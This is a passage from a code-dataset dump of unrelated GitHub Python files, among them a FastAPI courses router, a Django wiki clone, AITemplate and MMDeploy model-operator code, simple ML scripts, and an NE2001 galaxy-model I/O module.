math.asin(math.sqrt(math.sin((math.radians(cols.lat) - math.radians(property_lat))/2)**2 + math.cos(math.radians(property_lat)) * math.cos(math.radians(cols.lat)) * math.sin((math.radians(cols.long) - math.radians(property_lon))/2)**2)), axis = 1)\r\n # return sales_df.sort_values(\"distance\", ascending=True).head(n_closest).drop(\"distance\", axis=1)\r\n ################# Method with Numpy and vectorization#########################\r\n # sales_df['lat_rad'], sales_df['long_rad'] = np.radians(sales_df['lat']), np.radians(sales_df['long'])\r\n # sales_df['lat_diff'] = sales_df['lat_rad'] - math.radians(property_lat)\r\n # sales_df['long_diff'] = sales_df['long_rad'] - math.radians(property_lon)\r\n # sales_df['distance'] = 3963 * 2 * np.arcsin(np.sqrt(np.sin(sales_df['lat_diff']/2)**2 + math.cos(math.radians(property_lat)) * np.cos(sales_df['lat_rad']) * np.sin(sales_df['long_diff']/2)**2))\r\n # return sales_df.sort_values(\"distance\", ascending=True).head(n_closest).drop([\"distance\", \"lat_rad\", \"lat_diff\", \"long_diff\", \"long_rad\"], axis=1)\r\n ################ Convert np code to one line coder##################################\r\n # sales_df['distance'] = 3963 * 2 * np.arcsin(np.sqrt(np.sin((np.radians(sales_df['lat']) - math.radians(property_lat))/2)**2 + math.cos(math.radians(property_lat)) * np.cos(np.radians(sales_df['lat'])) * np.sin((np.radians(sales_df['long']) - math.radians(property_lon))/2)**2))\r\n # return sales_df.sort_values(\"distance\", ascending=True).head(n_closest).drop(\"distance\", axis=1)\r\n\r\nsales_df = pd.read_csv(\"sales.csv\")\r\nproperties_df = pd.read_csv(\"properties.csv\")\r\nfor index, row in properties_df.iterrows():\r\n print(find_closest_sales(5, sales_df, row['lat'], row['long']))\r\n","repo_name":"huangchong9004/citi_test","sub_path":"nearest10.py","file_name":"nearest10.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19818525170","text":"import itertools\nimport logging\nimport re\nfrom collections import OrderedDict\nfrom typing import List\n\nimport jinja2\n\nfrom aitemplate import backend\nfrom aitemplate.backend import registry\nfrom aitemplate.compiler.base import Operator, Tensor\nfrom aitemplate.utils import shape_utils\n\n# pylint: disable=C0103,W0221,R1732,W0613\nlogging.basicConfig(level=logging.INFO)\n\nSHAPE_FUNC_TEMPLATE = jinja2.Template(\n \"\"\"\n{{indent}}{{dtype}}NI = {{x_dim0}};\n{{indent}}{{dtype}}HI = {{x_dim1}};\n{{indent}}{{dtype}}WI = {{x_dim2}};\n{{indent}}{{dtype}}CI = {{x_dim3}};\n{{indent}}{{dtype}}KH = {{pooled_size}};\n{{indent}}{{dtype}}KW = {{pooled_size}};\n{{indent}}{{dtype}}NO = {{num_rois}};\n{{indent}}{{dtype}}CO = CI;\n{{indent}}{{dtype}}HO = {{pooled_size}};\n{{indent}}{{dtype}}WO = {{pooled_size}};\n\"\"\"\n)\n\nSHAPE_ASSIGNMENT_TEMPLATE = jinja2.Template(\n \"\"\"\n{{indent}}{{y_dim0}} = NO;\n{{indent}}{{y_dim1}} = HO;\n{{indent}}{{y_dim2}} = WO;\n\"\"\"\n)\n\nEXEC_COND_TEMPLATE = jinja2.Template(\n \"\"\"\n{{indent}}if ({{cond}}) {\n{{indent}} {{program}}\n{{indent}}}\n\"\"\"\n)\n\n\nclass roi_ops_base(Operator):\n \"\"\"\n Performs Region of Interest (RoI) Pool operator described in Fast R-CNN.\n\n * :attr:`num_rois` identifies the number of RoIs in the input.\n\n * :attr:`pooled_size` identifies the size of the pooling section, i.e., the size of the output (in bins or pixels) after the pooling\n is performed, as (height, width).\n\n * :attr:`sampling_ratio` is the number of sampling points in the interpolation grid\n used to compute the output value of each pooled output bin. If > 0,\n then exactly ``sampling_ratio x sampling_ratio`` sampling points per bin are used. If\n <= 0, then an adaptive number of grid points are used (computed as\n ``ceil(roi_width / output_width)``, and likewise for height).\n\n * :attr:`spatial_scale` is a scaling factor that maps the box coordinates to\n the input coordinates. For example, if your boxes are defined on the scale\n of a 224x224 image and your input is a 112x112 feature map (resulting from a 0.5x scaling of\n the original image), you'll want to set this to 0.5.\n\n * :attr:`position_sensitive`, a bool value.\n\n * :attr:`continuous_coordinate`. a bool value.\n\n Args:\n x (Tensor[N, H, W, C]): the feature map, i.e. a batch with ``N`` elements. Each element contains ``C`` feature maps of dimensions ``H x W``.\n rois (Tensor[roi_batch, 5]): the list of RoIs and each ROI contains the index of the corresponding element in the batch, i.e. a number in ``[0, N - 1]``, and the box coordinates in (x1, y1, x2, y2) format where the regions will be taken from. The coordinate must satisfy ``0 <= x1 < x2`` and ``0 <= y1 < y2``.\n\n Return:\n Tensor[roi_batch, pooled_size, pooled_size, C]: the fixed-size feature maps, i.e., the pooled RoIs.\n\n \"\"\"\n\n def __init__(\n self,\n num_rois,\n pooled_size,\n sampling_ratio,\n spatial_scale,\n position_sensitive,\n continuous_coordinate,\n ) -> None:\n super().__init__()\n self._attrs[\"op\"] = \"roi_align\"\n self._attrs[\"num_rois\"] = num_rois\n self._attrs[\"sampling_ratio\"] = sampling_ratio\n self._attrs[\"spatial_scale\"] = spatial_scale\n self._attrs[\"position_sensitive\"] = position_sensitive\n self._attrs[\"continuous_coordinate\"] = continuous_coordinate\n self._attrs[\"pooled_size\"] = pooled_size\n self.shape_eval_template = SHAPE_FUNC_TEMPLATE\n self.shape_save_template = SHAPE_ASSIGNMENT_TEMPLATE\n self.exec_cond_template = EXEC_COND_TEMPLATE\n\n def _infer_shape(self, x: List[int]):\n eval_func = self.shape_eval_template.render(\n indent=\"\",\n dtype=\"\",\n div=\"//\",\n x_dim0=x[0],\n x_dim1=x[1],\n x_dim2=x[2],\n x_dim3=x[3],\n num_rois=self._attrs[\"num_rois\"],\n pooled_size=self._attrs[\"pooled_size\"],\n position_sensitive=self._attrs[\"position_sensitive\"],\n )\n\n output = {}\n exec(eval_func, output) # noqa: P204 # noqa: P204\n return [\n int(output[\"NO\"]),\n int(output[\"HO\"]),\n int(output[\"WO\"]),\n int(output[\"CO\"]),\n ]\n\n def _infer_shapes(self, x: Tensor):\n x_shape_values = [var._attrs[\"values\"] for var in x._attrs[\"shape\"]]\n x_shapes = itertools.product(*x_shape_values)\n # run infershape for each\n y_shapes = []\n for x_shape in x_shapes:\n y_shape = self._infer_shape(x_shape)\n y_shapes.append(y_shape)\n\n def unique(vector):\n return sorted(set(vector))\n\n output_shape = [\n shape_utils.gen_int_var(unique([d[0] for d in y_shapes])),\n shape_utils.gen_int_var(unique([d[1] for d in y_shapes])),\n shape_utils.gen_int_var(unique([d[2] for d in y_shapes])),\n shape_utils.gen_int_var(unique([d[3] for d in y_shapes])),\n ]\n return output_shape\n\n def _invert_exec_key(self, key):\n tmp = re.findall(r\"(\\d+)\", key)\n return [int(x) for x in tmp]\n\n def _gen_exec_key(self, shape):\n return self.exec_key_template.render(\n x_dim0=shape[0], x_dim1=shape[1], x_dim2=shape[2], x_dim3=shape[3]\n ).replace(\"\\n\", \"\")\n\n def _extract_exec_path(self, x: Tensor):\n self._attrs[\"exec_path\"] = OrderedDict()\n self._attrs[\"exec_path\"][\"true\"] = \"\"\n\n def _signature(self):\n signature = \"roi_align: num_rois=[{num_rois}], \\\n sampling_ratio=[{sampling_ratio}], \\\n spatial_scale=[{spatial_scale}], \\\n position_sensitive=[{position_sensitive}], \\\n continuous_coordinate=[{continuous_coordinate}], \\\n pooled_size=[{pooled_size}]\".format(\n num_rois=self._attrs[\"num_rois\"],\n sampling_ratio=self._attrs[\"sampling_ratio\"],\n spatial_scale=self._attrs[\"spatial_scale\"],\n position_sensitive=self._attrs[\"position_sensitive\"],\n continuous_coordinate=self._attrs[\"continuous_coordinate\"],\n pooled_size=self._attrs[\"pooled_size\"],\n )\n return signature\n\n def __call__(self, x: Tensor, rois: Tensor) -> List[Tensor]:\n self._attrs[\"inputs\"] = [x, rois]\n self._set_depth()\n self._extract_exec_path(x)\n output_shape = self._infer_shapes(x)\n output = Tensor(output_shape, src_ops={self}, dtype=x._attrs[\"dtype\"])\n self._attrs[\"outputs\"] = [output]\n return output\n\n def _get_op_attributes(self):\n target_attrs = [\n \"continuous_coordinate\",\n \"num_rois\",\n \"pooled_size\",\n \"position_sensitive\",\n \"sampling_ratio\",\n \"spatial_scale\",\n ]\n attr = {}\n\n for target_attr in target_attrs:\n if target_attr in self._attrs:\n attr[target_attr] = self._attrs[target_attr]\n\n return attr\n\n def gen_function(self) -> str:\n target = backend.target.Target.current()\n template_path = target.template_path()\n func_key = \"{target}.{op}.gen_function\".format(\n target=target.name(), op=self._attrs[\"op\"]\n )\n func = registry.get(func_key)\n return func(\n self._attrs,\n template_path,\n self.exec_cond_template,\n self.shape_eval_template,\n self.shape_save_template,\n )\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/compiler/ops/vision_ops/roi_ops/roi_ops.py","file_name":"roi_ops.py","file_ext":"py","file_size_in_byte":7607,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"41852016577","text":"from fastapi import APIRouter, Query\nfrom pymongo import ASCENDING, DESCENDING\nfrom typing import List\nfrom bson import ObjectId\n\nfrom models.courses import Course, Chapter\nfrom config import collection\n\nrouter = APIRouter()\n\n\n@router.get('/courses', response_model=List[Course])\ndef get_courses(sort_by: str = 'alphabetical', domain: List[str] = Query(None)):\n sort_dict = {\n 'alphabetical': ('name', ASCENDING),\n 'date': ('date', DESCENDING),\n 'rating': ('rating', DESCENDING)\n }\n sort_key, sort_order = sort_dict.get(sort_by, sort_dict['alphabetical'])\n\n query = {}\n if domain:\n query['domain'] = {'$in': domain}\n\n courses = list(collection.find(query).sort(sort_key, sort_order))\n return courses\n\n\n@router.get('/courses/{course_id}', response_model=Course)\ndef get_course(course_id: str):\n course = collection.find_one({'_id': ObjectId(course_id)})\n if course:\n return course\n else:\n return {'error': 'Course not found.'}\n\n\n@router.get('/courses/{course_id}/chapters/{chapter_index}', response_model=Chapter)\ndef get_chapter(course_id: str, chapter_index: int):\n course = collection.find_one({'_id': ObjectId(course_id)})\n if course and chapter_index < len(course['chapters']):\n return course['chapters'][chapter_index]\n else:\n return {'error': 'Chapter not found.'}\n\n\n@router.post('/courses/{course_id}/chapters/{chapter_index}/rate', response_model=Chapter)\ndef rate_chapter(course_id: str, chapter_index: int, rating: bool):\n course = collection.find_one({'_id': ObjectId(course_id)})\n if course and chapter_index < len(course['chapters']):\n chapters = course['chapters']\n chapters[chapter_index]['rating'] += 1 if rating else -1 \n course_rating_aggregate = sum([chapter['rating'] for chapter in chapters])\n \n collection.update_one({'_id': ObjectId(course_id)}, {'$set': {\n 'chapters': chapters,\n 'rating': course_rating_aggregate\n }})\n return course['chapters'][chapter_index]\n else:\n return {'error': 'Chapter not found.'}\n ","repo_name":"chandankuiry/kimo-assignment","sub_path":"routers/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1849198781","text":"from django.urls import path\nfrom . import views\nurlpatterns = [\n path('login/', views.logar, name=\"login\"),\n path('home/', views.home, name=\"home\"),\n path('addTreinador', views.addTreinador, name=\"addTreinador\"),\n path('addItens/', views.addItens, name=\"addItens\"),\n path('delete-pokemon//', views.deletePokemon, name='deletePokemon'),\n path('visao/', views.visao, name=\"visao\"),\n path('addPoke/', views.addPoke, name=\"addPoke\"),\n path('addinfopoke/', views.addinfopoke, name=\"addinfopoke\"),\n]","repo_name":"JVictor011/Pokedex","sub_path":"usuarios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24924287785","text":"from django.shortcuts import render\nfrom markdown2 import Markdown\nfrom django.http import HttpResponseRedirect\nfrom django import forms\nfrom django.urls import reverse\n\nimport random\n\nmarkdowner = Markdown()\n\nfrom . import util\n\n\ndef index(request):\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\n\ndef edit(request, entrytitle):\n #Who knew that get_entry loaded the contents of the file *FACEPALM*\n loadpage = util.get_entry(entrytitle) \n if request.method == \"POST\":\n util.delete_entry(entrytitle)\n entrytitle = request.POST[\"title\"]\n entryarea = request.POST[\"entryarea\"]\n\n util.save_entry(entrytitle, entryarea)\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': entrytitle}))\n else:\n return render(request, \"encyclopedia/edit.html\", {\n \"entrytitle\": entrytitle,\n \"entryarea\": loadpage\n })\n\ndef entry(request, title):\n entrylist = util.list_entries()\n if title in entrylist:\n entryname = util.get_entry(title)\n conventry = markdowner.convert(entryname)\n return render(request, \"encyclopedia/entry.html\", {\n #Pass the new page both so you can edit the TITLE and display BODY\n \"entry\": markdowner.convert(entryname),\n \"entrytitle\": title\n })\n else:\n return render(request, \"encyclopedia/entryfail.html\", {\n \"entrytitle\": title\n })\n\ndef search(request):\n searchitem = request.GET.get(\"q\")\n if (util.get_entry(searchitem) is not None):\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': searchitem}))\n else:\n subString = []\n for entry in util.list_entries():\n if searchitem.upper() in entry.upper():\n subString.append(entry)\n if len(subString) == 0:\n return render(request, \"encyclopedia/entryfail.html\", {\n \"entrytitle\": searchitem\n })\n\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": subString,\n \"search\": True,\n \"searchitem\": searchitem\n })\n\n\ndef create(request):\n if request.method == \"POST\":\n entrytitle = request.POST[\"title\"]\n entryarea = request.POST[\"entryarea\"]\n #If it doesn't exist, \n if (util.get_entry(entrytitle) is None):\n util.save_entry(entrytitle, entryarea)\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': entrytitle}))\n else:\n strstr = \"The entry \" + entrytitle + \" already exists, edit name or choose another.\"\n return render(request, \"encyclopedia/create.html\", {\n \"message\": strstr,\n \"entrytitle\": entrytitle,\n \"entryarea\": entryarea\n })\n else:\n return render(request, \"encyclopedia/create.html\",)\n\ndef rando(request):\n #Load the list entries\n #Find random number between 0 and len(list)\n #Go to the link of that pages entrytitle\n listentry = util.list_entries()\n length = len(listentry)\n rand = random.randint(0,length-1)\n entry = listentry[rand]\n return HttpResponseRedirect(reverse(\"entry\", kwargs={'title': entry}))\n","repo_name":"Mattmont415/WikipediaClone-Django-Python","sub_path":"encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15089451412","text":"import pandas as pd\r\nimport numpy as np\r\nfrom statsmodels.tsa.arima.model import ARIMA\r\nimport matplotlib.pyplot as plt\r\n\r\n# Load the time series data\r\ndata = pd.read_csv('time_series_data.csv')\r\n\r\n# Convert the data into a time series object\r\nts = data['Value']\r\n\r\n# Fit the ARIMA model\r\nmodel = ARIMA(ts, order=(1,1,1))\r\nmodel_fit = model.fit()\r\n\r\n# Print summary of the model\r\nprint(model_fit.summary())\r\n\r\n# Plot the residuals\r\nresiduals = pd.DataFrame(model_fit.resid)\r\nresiduals.plot()\r\nplt.show()\r\n\r\n# Plot the residuals density\r\nresiduals.plot(kind='kde')\r\nplt.show()\r\n\r\n# Perform a normality test on the residuals\r\nfrom scipy.stats import normaltest\r\nstat, p = normaltest(residuals)\r\nprint('Statistics=%.3f, p=%.3f' % (stat, p))\r\n\r\n# Make predictions\r\nforecast = model_fit.forecast(steps=10)[0]\r\n","repo_name":"deep-palariya/Time-Series-Analysis","sub_path":"timeseriescode.py","file_name":"timeseriescode.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9947312034","text":"import numpy as np \nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom process import get_data\nfrom predict import softmax\n\ndef y2indicator(y, K):\n N = len(y)\n ind = np.zeros((N, K))\n for i in range(N):\n ind[i, y[i]] = 1\n return ind\n\n\ndef forward(X, W, b):\n return softmax(X.dot(W) + b)\n\ndef predict(P_Y_given_X):\n return np.argmax(P_Y_given_X, axis=1)\n\ndef classification_rate(Y, P):\n return np.mean(Y == P)\n\ndef cross_entropy(Y, pY):\n # N, _ = Y.shape\n # return -(np.sum(Y * np.log(pY)))/N\n return -np.mean(Y * np.log(pY))\n\ndef main():\n Xtrain, Ytrain, Xtest, Ytest = get_data()\n\n D = Xtrain.shape[1]\n K = len(set(Ytrain) | set(Ytest))\n\n # convert to indicator\n Ytrain_ind = y2indicator(Ytrain, K)\n Ytest_ind = y2indicator(Ytest, K)\n\n # randomly initialize weights\n W = np.random.randn(D, K)\n b = np.zeros(K)\n\n train_costs = []\n test_costs = []\n learning_rate = 0.001\n # run for 10,000 epochs in this example\n for i in range(10000):\n pYtrain = forward(Xtrain, W, b)\n pYtest = forward(Xtest, W, b)\n\n ctrain = cross_entropy(Ytrain_ind, pYtrain)\n ctest = cross_entropy(Ytest_ind, pYtest)\n\n train_costs.append(ctrain)\n test_costs.append(ctest)\n\n # gradient descent\n W -= learning_rate * Xtrain.T.dot(pYtrain - Ytrain_ind)\n b -= learning_rate * (pYtrain - Ytrain_ind).sum(axis=0)\n\n # if i % 1000 == 0:\n # print(i, ctrain, ctest)\n\n acc_train = classification_rate(Ytrain, predict(pYtrain))\n print('Score:', acc_train) \n\n acc_test = classification_rate(Ytest, predict(pYtest))\n print('Score - Test:', acc_test) \n\n plt.plot(train_costs, label = 'train cost')\n plt.plot(test_costs, label = 'test cost')\n plt.legend()\n plt.show()\n \nif __name__ == '__main__':\n main()","repo_name":"jacksauser/ML-and-Computer-Vision","sub_path":"logistic_softmax_train.py","file_name":"logistic_softmax_train.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72499812969","text":"'''\n@Author: Yang\n@Date: 2019-11-06 16:09:32\n@LastEditors: Yang\n@LastEditTime: 2019-11-07 09:45:52\n@FilePath: /Python/regular.py\n@Description: \n'''\n\nimport re\n\n\ndef main():\n userName = input('请输入您的用户名:')\n\n # m1 = re.match(r'^/w{6,20}$', userName)\n\n # if not m1:\n # print('请输入有效的用户名')\n\n # qq = input('请输入您的qq账号:')\n # m2 = re.match(r'^[1-9]/d{4,11}&', qq)\n # if not m2:\n # print('请输入有效的QQ号.')\n # if m1 and m2:\n # print('你输入的信息是有效的!')\n m1 = re.match(r'(?>=abc)\\d\\s')\n if m1:\n print(m1)\n\n\nif __name__ == \"__main__\":\n main()\n\n\"\"\"\n . 用来匹配任何单个字符,换行符除外\n [] 匹配字符集合\n \\d 数字字符,等价于[0-9]\n \\D 非数字字符,等价于[^0-9]\n \\w 字母数字下划线,等价于[a-z0-9A-Z_]\n \\W 非数字字母下划线,等价于[^a-z0-9\bA-Z_]\n \\s 空白字符,换行,换页,制表符等,等价于[\\f\\r\\n\\v\\t]\n \\S 非空白字符\n \n\n\"\"\"\n","repo_name":"devYoungyang/Python-Study","sub_path":"Python/regular.py","file_name":"regular.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13920347821","text":"from typing import Dict, List, Optional\n\nimport torch\nfrom mmdet.models.utils import aligned_bilinear\nfrom mmengine.config import ConfigDict\nfrom torch import Tensor\n\nfrom mmdeploy.codebase.mmdet.deploy import get_post_processing_params\nfrom mmdeploy.core import FUNCTION_REWRITER\nfrom mmdeploy.mmcv.ops.nms import multiclass_nms\n\n\n@FUNCTION_REWRITER.register_rewriter(\n 'mmdet.models.dense_heads.CondInstBboxHead.predict_by_feat')\ndef condinst_bbox_head__predict_by_feat(\n self,\n cls_scores: List[Tensor],\n bbox_preds: List[Tensor],\n score_factors: Optional[List[Tensor]] = None,\n param_preds: Optional[List[Tensor]] = None,\n batch_img_metas: Optional[List[dict]] = None,\n cfg: Optional[ConfigDict] = None,\n rescale: bool = False,\n with_nms: bool = True,\n):\n ctx = FUNCTION_REWRITER.get_context()\n deploy_cfg = ctx.cfg\n\n assert len(cls_scores) == len(bbox_preds)\n device = bbox_preds[0].device\n cfg = self.test_cfg if cfg is None else cfg\n batch_size = bbox_preds[0].shape[0]\n featmap_sizes = [cls_score.shape[-2:] for cls_score in cls_scores]\n\n all_level_points_strides = self.prior_generator.grid_priors(\n featmap_sizes, device=device, with_stride=True)\n all_level_points = [i[:, :2] for i in all_level_points_strides]\n all_level_strides = [i[:, 2] for i in all_level_points_strides]\n\n flatten_cls_scores = [\n cls_score.permute(0, 2, 3, 1).reshape(batch_size, -1,\n self.cls_out_channels)\n for cls_score in cls_scores\n ]\n flatten_bbox_preds = [\n bbox_pred.permute(0, 2, 3, 1).reshape(batch_size, -1, 4)\n for bbox_pred in bbox_preds\n ]\n flatten_score_factors = [\n score_factor.permute(0, 2, 3, 1).reshape(batch_size, -1, 1)\n for score_factor in score_factors\n ]\n flatten_param_preds = [\n param_pred.permute(0, 2, 3, 1).reshape(batch_size, -1, self.num_params)\n for param_pred in param_preds\n ]\n flatten_cls_scores = torch.cat(flatten_cls_scores, dim=1).sigmoid()\n flatten_bbox_preds = torch.cat(flatten_bbox_preds, dim=1)\n flatten_score_factors = torch.cat(flatten_score_factors, dim=1).sigmoid()\n flatten_param_preds = torch.cat(flatten_param_preds, dim=1)\n\n points = torch.cat(all_level_points)\n strides = torch.cat(all_level_strides)\n tl_x = points[..., 0] - flatten_bbox_preds[..., 0]\n tl_y = points[..., 1] - flatten_bbox_preds[..., 1]\n br_x = points[..., 0] + flatten_bbox_preds[..., 2]\n br_y = points[..., 1] + flatten_bbox_preds[..., 3]\n\n bboxes = torch.stack([tl_x, tl_y, br_x, br_y], -1)\n scores = flatten_cls_scores\n score_factors = flatten_score_factors\n param_preds = flatten_param_preds\n scores = scores * score_factors\n\n # get post processing config\n post_params = get_post_processing_params(deploy_cfg)\n max_output_boxes_per_class = post_params.max_output_boxes_per_class\n iou_threshold = cfg.nms.get('iou_threshold', post_params.iou_threshold)\n score_threshold = cfg.get('score_thr', post_params.score_threshold)\n pre_top_k = post_params.pre_top_k\n keep_top_k = cfg.get('max_per_img', post_params.keep_top_k)\n\n dets, labels, inds = multiclass_nms(\n bboxes,\n scores,\n max_output_boxes_per_class,\n iou_threshold,\n score_threshold,\n pre_top_k=pre_top_k,\n keep_top_k=keep_top_k,\n output_index=True,\n )\n\n batch_inds = torch.arange(batch_size, device=bboxes.device).view(-1, 1)\n points = points.unsqueeze(0).repeat(batch_size, 1, 1)\n strides = strides.unsqueeze(0).repeat(batch_size, 1)\n param_preds = param_preds[batch_inds, inds, :]\n points = points[batch_inds, inds, :]\n strides = strides[batch_inds, inds]\n results = dict(\n dets=dets,\n labels=labels,\n param_preds=param_preds,\n points=points,\n strides=strides)\n return results\n\n\n@FUNCTION_REWRITER.register_rewriter(\n 'mmdet.models.dense_heads.CondInstMaskHead.forward')\ndef condinst_mask_head__forward(self, x: tuple,\n positive_infos: Dict[str, torch.Tensor]):\n mask_feats = self.mask_feature_head(x)\n\n param_preds = positive_infos['param_preds']\n points = positive_infos['points']\n strides = positive_infos['strides']\n\n batch_size = points.shape[0]\n num_insts = points.shape[1]\n hw = mask_feats.size()[-2:]\n mask_feats = mask_feats.unsqueeze(1).repeat(1, num_insts, 1, 1, 1)\n\n points = points.reshape(-1, 1, 2).unsqueeze(0)\n locations = self.prior_generator.single_level_grid_priors(\n hw, level_idx=0, device=mask_feats.device)\n locations = locations.unsqueeze(0).repeat(batch_size, 1,\n 1).reshape(batch_size, 1, -1, 2)\n centers = points.reshape(batch_size, -1, 1, 2)\n rel_coordinates = (centers - locations).permute(0, 1, 3, 2).float()\n rel_coordinates /= (strides[:, :, None, None] * self.size_of_interest)\n rel_coords = rel_coordinates.reshape(batch_size, -1, 2, hw[0], hw[1])\n mask_head_inputs = torch.cat([rel_coords, mask_feats], dim=2)\n\n weights, biases = _parse_dynamic_params(self, param_preds)\n mask_preds = _dynamic_conv_forward(mask_head_inputs, weights, biases)\n mask_preds = mask_preds.reshape(batch_size, num_insts, hw[0], hw[1])\n mask_preds = aligned_bilinear(\n mask_preds, int(self.mask_feat_stride / self.mask_out_stride))\n return (mask_preds, )\n\n\n@FUNCTION_REWRITER.register_rewriter(\n 'mmdet.models.dense_heads.CondInstMaskHead.predict_by_feat')\ndef condinst_mask_head__predict_by_feat(self,\n mask_preds: Tensor,\n results_list: Dict[str, torch.Tensor],\n batch_img_metas: List[dict],\n rescale: bool = True,\n **kwargs):\n cfg = self.test_cfg\n\n dets = results_list['dets']\n labels = results_list['labels']\n img_hw = batch_img_metas[0]['img_shape'][:2]\n\n mask_preds = mask_preds.sigmoid()\n mask_preds = aligned_bilinear(mask_preds, self.mask_out_stride)\n mask_preds = mask_preds[:, :, :img_hw[0], :img_hw[1]]\n masks = (mask_preds > cfg.mask_thr).float()\n\n return dets, labels, masks\n\n\ndef _parse_dynamic_params(self, params: Tensor):\n \"\"\"parse the dynamic params for dynamic conv.\"\"\"\n batch_size = params.shape[0]\n num_insts = params.shape[1]\n params = params.permute(1, 0, 2)\n params_splits = list(\n torch.split_with_sizes(\n params, self.weight_nums + self.bias_nums, dim=2))\n\n weight_splits = params_splits[:self.num_layers]\n bias_splits = params_splits[self.num_layers:]\n\n for idx in range(self.num_layers):\n if idx < self.num_layers - 1:\n weight_splits[idx] = weight_splits[idx].reshape(\n batch_size, num_insts, self.in_channels, -1)\n else:\n weight_splits[idx] = weight_splits[idx].reshape(\n batch_size, num_insts, 1, -1)\n\n return weight_splits, bias_splits\n\n\ndef _dynamic_conv_forward(features: Tensor, weights: List[Tensor],\n biases: List[Tensor]):\n \"\"\"dynamic forward, each layer follow a relu.\"\"\"\n n_layers = len(weights)\n x = features.flatten(0, 1).flatten(2)\n for i, (w, b) in enumerate(zip(weights, biases)):\n # replace dynamic conv with bmm\n w = w.flatten(0, 1)\n b = b.flatten(0, 1).unsqueeze(2)\n x = torch.bmm(w, x)\n x = x + b\n if i < n_layers - 1:\n x = x.clamp_(min=0)\n return x\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/codebase/mmdet/models/dense_heads/condinst_head.py","file_name":"condinst_head.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"20292721062","text":"\"\"\" Module for I/O\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport json\nimport os\nfrom builtins import super\n\nimport numpy as np\nfrom astropy.table import Table\nfrom scipy.interpolate import CubicSpline\n\nfrom . import __path__\n\nDATA_PATH = os.path.join(__path__[0], 'data')\n\n\ndef numpify_dict(d):\n \"\"\"\n Recursively make lists in a dictionary into numpy array\n \"\"\"\n def numpify(d):\n for k, v in d.items():\n if isinstance(v, list):\n d[k] = np.array(v)\n elif isinstance(v, dict):\n numpify(v)\n new_dict = d.copy()\n numpify(new_dict)\n return new_dict\n\n\nclass Params(dict):\n \"\"\"\n Input parameters\n \"\"\"\n\n def __init__(self, ifile='ne2001_params.json', path=None, **new_params):\n \"\"\"\n \"\"\"\n if path is None:\n path = DATA_PATH\n self.path = path\n self.ifile = ifile\n try:\n params = numpify_dict(parse_json(os.path.join(self.path,\n self.ifile)))\n params['spiral_arms']['adict'] = init_spiral_arms()\n except IOError:\n params = {}\n params.update(new_params)\n super().__init__(params)\n\n\ndef parse_json(json_file):\n \"Parse json file\"\n with open(json_file, 'rt') as json_data:\n data = json.load(json_data)\n return data\n\n\ndef read_galparam(ifile='gal_param.json'):\n \"\"\"\n Read Galaxy parameters\n\n Parameters\n ----------\n ifile : str, optional\n\n Returns\n -------\n gal_param : dict\n\n \"\"\"\n old_param = parse_json(os.path.join(DATA_PATH, ifile))\n gal_param = {}\n\n gal_param['thick_disk'] = dict(e_density=(old_param['n1h1'] /\n old_param['h1']),\n height=old_param['h1'],\n radius=old_param['A1'],\n F=old_param['F1'])\n\n gal_param['thin_disk'] = dict(e_density=old_param['n2'],\n height=old_param['h2'],\n radius=old_param['A2'],\n F=old_param['F2'])\n\n return gal_param\n\n\ndef read_gc(ifile='ne_gc.json'):\n \"\"\" Read Galactic Center parameters\n Returns\n -------\n gc_param : dict\n dict of parameters\n\n \"\"\"\n old_param = parse_json(os.path.join(DATA_PATH, ifile))\n gc_param = {}\n\n gc_param['galactic_center'] = dict(e_density=old_param['negc0'],\n center=tuple(old_param['centroid'].\n values()),\n F=old_param['Fgc0'],\n height=old_param['hgc'],\n radius=old_param['rgc'])\n\n return gc_param\n\n\ndef read_lism(ifile='ne_lism.json'):\n \"\"\"\n Parameters\n ----------\n ifile : str, optional\n\n Returns\n -------\n lism_dict : dict\n\n \"\"\"\n # Read\n with open(os.path.join(DATA_PATH, ifile), 'rt') as fh:\n lism_dict = json.load(fh)\n # Return\n return lism_dict\n\n\ndef init_spiral_arms(ifile='ne_arms_log_mod.inp'):\n armsinp = os.path.join(DATA_PATH, ifile)\n # logarms = DATA_PATH + 'log_arms.out'\n\n narms = 5\n # integer armmap(5)\t\t! for remapping from Wainscoat\n # data armmap/1, 3, 4, 2, 5/\t! order to TC93 order, which is\n # ! from GC outwards toward Sun.\n armmap = [1, 3, 4, 2, 5]\n NNj = [20, 20, 20, 20, 20]\n narmpoints = 500\n ncoord = 2\n NNmax = 20\n rad = 180/np.pi\n # Arms\n arms_tbl = Table.read(armsinp, format='ascii') # a, rmin, thmin, extent\n assert len(arms_tbl) == narms\n\n r1 = np.zeros((NNmax, narms))\n th1 = np.zeros((NNmax, narms))\n kmax = 